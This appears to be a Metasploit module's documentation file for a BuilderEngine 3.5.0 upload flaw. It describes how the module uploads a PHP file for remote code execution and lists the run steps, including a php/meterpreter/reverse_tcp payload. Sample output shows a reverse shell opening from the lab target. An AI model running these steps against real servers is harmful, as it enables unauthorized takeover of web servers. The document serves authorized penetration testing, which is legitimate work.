documentation/modules/exploit/multi/http/builderengine_upload_exec.md
BuilderEngine is a Content Management System (CMS) that is Open Source, and includes blog, eCommerce, booking modules, etc. A vulnerability was found in the jQuery upload plugin, which could be abused upload a malicious file, which would result in arbitrary remote code execution under the context of the web server.
According to public advisory, BuilderEngine 3.5.0 is vulnerable to this attack.
A vulnerable copy was collected by Exploit-DB, which can be downloaded here:
https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
Another way to test this exploit is by using the Sedna image:
https://www.vulnhub.com/entry/hackfest2016-sedna,181/#
To see if the service is running BuilderEngine, you may use the check command from the module. If the resource is found, then you may see the following output:
msf exploit(builderengine_upload_exec) > check
[*] 192.168.1.123:80 The target appears to be vulnerable.
Knowing that the jquery-file-upload plugin is available, you can try the by following these
steps:
exploit/multi/http/builderengine_upload_execset RHOST [Target IP]set PAYLOAD php/meterpreter/reverse_tcpset LHOST [Your IP]exploitIf exploited successfully, you should see an output similar to the following:
msf exploit(builderengine_upload_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.1:4444
[+] Our payload is at: RnrXvNHDaQA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.1.123
[*] Meterpreter session 3 opened (192.168.1.1:4444 -> 192.168.1.123:51354) at 2017-05-16 14:44:14 -0500
[+] Deleted RnrXvNHDaQA.php
meterpreter >